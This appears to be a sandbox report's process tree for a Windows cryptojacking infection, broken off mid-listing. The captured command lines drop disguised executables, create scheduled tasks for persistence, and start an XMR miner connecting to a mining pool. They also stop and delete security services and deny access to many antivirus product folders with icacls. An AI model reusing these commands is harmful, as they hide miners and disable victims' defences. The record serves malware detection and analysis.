C:\Windows\system32\icacls.exeicacls "c:\windows\system32\systemreset.exe" /grant:r Admin:F8⤵
- Possible privilege escalation attempt
PID:3876
-
-
-
-
-
-
C:\programdata\microsoft\intel\MOS.exeC:\programdata\microsoft\intel\MOS.exe4⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4444 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\M.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\M.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2420
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\R.vbs"5⤵PID:4588
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Programdata\Microsoft\Intel\OS.bat" "6⤵PID:4620
-
\??\c:\Programdata\Microsoft\Intel\Cheat64.exe"c:\Programdata\Microsoft\Intel\Cheat64.exe" /qn7⤵
- Executes dropped EXE
PID:1600 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 18⤵
- Scheduled Task/Job: Scheduled Task
PID:4576
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST8⤵
- Scheduled Task/Job: Scheduled Task
PID:32
-
-
C:\ProgramData\RealtekHD\taskhostw.exeC:\ProgramData\RealtekHD\taskhostw.exe8⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
PID:2312 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns9⤵PID:4584
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns10⤵
- Gathers network information
PID:3076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force9⤵PID:3868
-
C:\Windows\system32\gpupdate.exegpupdate /force10⤵PID:1560
-
-
-
C:\ProgramData\WindowsTask\AppHost.exeC:\ProgramData\WindowsTask\AppHost.exe -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] --donate-level=1 -p x -t49⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1116
-
-
C:\ProgramData\WindowsTask\AppHost.exeC:\ProgramData\WindowsTask\AppHost.exe -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] --donate-level=1 -p x -t49⤵
- Executes dropped EXE
PID:5004
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat4⤵
- Drops file in Drivers directory
PID:2684 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:764
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat4⤵PID:4412
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:1308
-
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 5 /NOBREAK5⤵
- Delays execution with timeout.exe
PID:5000
-
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAK5⤵
- Delays execution with timeout.exe
PID:360
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM 1.exe /T /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4424
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM P.exe /T /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1428
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows5⤵
- Views/modifies file attributes
PID:4476
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appidsvc2⤵
- Suspicious use of WriteProcessMemory
PID:3180 -
C:\Windows\SysWOW64\sc.exesc start appidsvc3⤵
- Launches sc.exe
PID:3016
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appmgmt2⤵
- Suspicious use of WriteProcessMemory
PID:4212 -
C:\Windows\SysWOW64\sc.exesc start appmgmt3⤵
- Launches sc.exe
PID:1192
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appidsvc start= auto2⤵
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\SysWOW64\sc.exesc config appidsvc start= auto3⤵
- Launches sc.exe
PID:2976
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appmgmt start= auto2⤵
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Windows\SysWOW64\sc.exesc config appmgmt start= auto3⤵
- Launches sc.exe
PID:4476
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop swprv2⤵
- Suspicious use of WriteProcessMemory
PID:3296 -
C:\Windows\SysWOW64\sc.exesc stop swprv3⤵
- Launches sc.exe
PID:1536
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config swprv start= disabled2⤵PID:3080
-
C:\Windows\SysWOW64\sc.exesc config swprv start= disabled3⤵
- Launches sc.exe
PID:2616
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice2⤵PID:380
-
C:\Windows\SysWOW64\sc.exesc stop mbamservice3⤵
- Launches sc.exe
PID:3492
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice2⤵PID:4456
-
C:\Windows\SysWOW64\sc.exesc stop bytefenceservice3⤵
- Launches sc.exe
PID:4728
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop crmsvc2⤵PID:1580
-
C:\Windows\SysWOW64\sc.exesc stop crmsvc3⤵
- Launches sc.exe
PID:3016
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice2⤵PID:1192
-
C:\Windows\SysWOW64\sc.exesc delete bytefenceservice3⤵
- Launches sc.exe
PID:4140
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice2⤵PID:2416
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice3⤵
- Launches sc.exe
PID:4984
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc2⤵PID:4508
-
C:\Windows\SysWOW64\sc.exesc delete crmsvc3⤵
- Launches sc.exe
PID:2148
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete "windows node"2⤵PID:2344
-
C:\Windows\SysWOW64\sc.exesc delete "windows node"3⤵
- Launches sc.exe
PID:2268
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\ProgramData\olly.exe /deny %username%:(F)2⤵PID:5000
-
C:\Windows\SysWOW64\icacls.exeicacls C:\ProgramData\olly.exe /deny Admin:(F)3⤵
- Modifies file permissions
PID:4664
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\ProgramData\Iostream.exe /deny %username%:(F)2⤵PID:4560
-
C:\Windows\SysWOW64\icacls.exeicacls C:\ProgramData\Iostream.exe /deny Admin:(F)3⤵PID:1596
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\ProgramData\SystemIdle.exe /deny %username%:(F)2⤵PID:2288
-
C:\Windows\SysWOW64\icacls.exeicacls C:\ProgramData\SystemIdle.exe /deny Admin:(F)3⤵PID:4464
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Bot.exe /deny %username%:(F)2⤵PID:760
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Bot.exe /deny Admin:(F)3⤵
- Modifies file permissions
PID:3836
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\winhost.exe /deny %username%:(F)2⤵PID:4984
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\winhost.exe /deny Admin:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3016
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Nvidiadriver.exe /deny %username%:(F)2⤵PID:2972
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Nvidiadriver.exe /deny Admin:(F)3⤵
- Modifies file permissions
PID:488
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe /deny %username%:(F)2⤵PID:4348
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe /deny Admin:(F)3⤵
- Modifies file permissions
PID:3552
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)2⤵PID:3272
-
C:\Windows\SysWOW64\icacls.exeicacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:996
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)2⤵PID:1308
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:316
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)2⤵PID:5076
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4532
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)2⤵PID:3324
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1748
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)2⤵PID:2740
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4476
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2760
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)2⤵PID:2304
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3348
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)2⤵PID:1488
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
PID:3852
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)2⤵PID:488
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)3⤵PID:4136
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)2⤵PID:2824
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1400
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)2⤵PID:4560
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4492
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)2⤵PID:1504
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
PID:4052
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)2⤵PID:2688
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)3⤵PID:4856
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)2⤵PID:5020
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)3⤵PID:3360
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)2⤵PID:2124
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1896
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)2⤵PID:3552
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4588
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)3⤵PID:4324
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)2⤵PID:2580
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
PID:4112
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵PID:4052
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵PID:3708
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)2⤵PID:2236
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4680
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)3⤵PID:3348
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)2⤵PID:1736
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2988
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)2⤵PID:4016
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2268
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵PID:4240
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:836
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)2⤵PID:4632
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1604
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)2⤵PID:2660
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
PID:956
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)2⤵PID:3804
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
PID:1292
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)2⤵PID:4620
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:428
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)2⤵PID:4368
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3552
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
PID:2108
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)2⤵PID:4328
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4868
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)2⤵PID:4516
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4348
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3860
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)2⤵PID:4728
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2236
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:5044
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)2⤵PID:516
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4664
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
PID:4016
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Package Cache" /deny System:(OI)(CI)(F)2⤵PID:3324
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Package Cache" /deny System:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
PID:3836
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Package Cache" /deny %username%:(OI)(CI)(F)2⤵PID:4532
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:316
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Package Cache" /deny Admin:(OI)(CI)(F)3⤵PID:1604
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)2⤵PID:3360
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:956
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)2⤵PID:4216
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
PID:3804
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)2⤵PID:4076
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3736
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)2⤵PID:3492
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
PID:4868
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)2⤵PID:1108
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3860
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)2⤵PID:2688
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3876
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\windows\syswow64\xmr64 /deny %username%:(OI)(CI)(F)2⤵PID:1952
-
C:\Windows\SysWOW64\icacls.exeicacls C:\windows\syswow64\xmr64 /deny Admin:(OI)(CI)(F)3⤵PID:4544
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\windows\system32\xmr /deny system:(OI)(CI)(F)2⤵PID:2244
-
C:\Windows\SysWOW64\icacls.exeicacls C:\windows\system32\xmr /deny system:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
PID:2812
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\windows\syswow64\xmr64 /deny %username%:(OI)(CI)(F)2⤵PID:4540
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1292
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\windows\syswow64\xmr64 /deny Admin:(OI)(CI)(F)3⤵PID:3860
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\windows\system32\xmr /deny system:(OI)(CI)(F)2⤵PID:360
-
C:\Windows\SysWOW64\icacls.exeicacls C:\windows\system32\xmr /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2992
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\windows\windowsnode /deny %username%:(OI)(CI)(F)2⤵PID:4648
-
C:\Windows\SysWOW64\icacls.exeicacls C:\windows\windowsnode /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
PID:1236
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\windows\windowsnode /deny system:(OI)(CI)(F)2⤵PID:3804
-
C:\Windows\SysWOW64\icacls.exeicacls C:\windows\windowsnode /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2104
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\programdata\GOOGLE /deny %username%:(OI)(CI)(F)2⤵PID:2844
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\GOOGLE /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
PID:600
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\windows\syswow64\hhsm /deny %username%:(OI)(CI)(F)2⤵PID:2108
-
C:\Windows\SysWOW64\icacls.exeicacls C:\windows\syswow64\hhsm /deny Admin:(OI)(CI)(F)3⤵PID:4136
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\windows\hhsm /deny %username%:(OI)(CI)(F)2⤵PID:3960
-
C:\Windows\SysWOW64\icacls.exeicacls C:\windows\hhsm /deny Admin:(OI)(CI)(F)3⤵PID:3876
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\programdata\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8} /deny %username%:(OI)(CI)(F)2⤵PID:4368
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8} /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2420
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\programdata\Cefunpacked /deny %username%:(OI)(CI)(F)2⤵PID:3192
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4052
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\Cefunpacked /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
PID:3400
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\programdata\prefssecure /deny %username%:(OI)(CI)(F)2⤵PID:828
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:996
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\prefssecure /deny Admin:(OI)(CI)(F)3⤵PID:2692
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\MicrosoftCorporation /deny %username%:(OI)(CI)(F)2⤵PID:4596
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\MicrosoftCorporation /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4632
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\programdata\tiser /deny %username%:(OI)(CI)(F)2⤵PID:836
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\tiser /deny Admin:(OI)(CI)(F)3⤵PID:1128
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windowsdata /deny %username%:(OI)(CI)(F)2⤵PID:5012
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1748
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windowsdata /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
PID:624
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls D:\Windowsdata /deny %username%:(OI)(CI)(F)2⤵PID:2232
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2972
-
-
C:\Windows\SysWOW64\icacls.exeicacls D:\Windowsdata /deny Admin:(OI)(CI)(F)3⤵PID:4356
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls E:\Windowsdata /deny %username%:(OI)(CI)(F)2⤵PID:4984
-
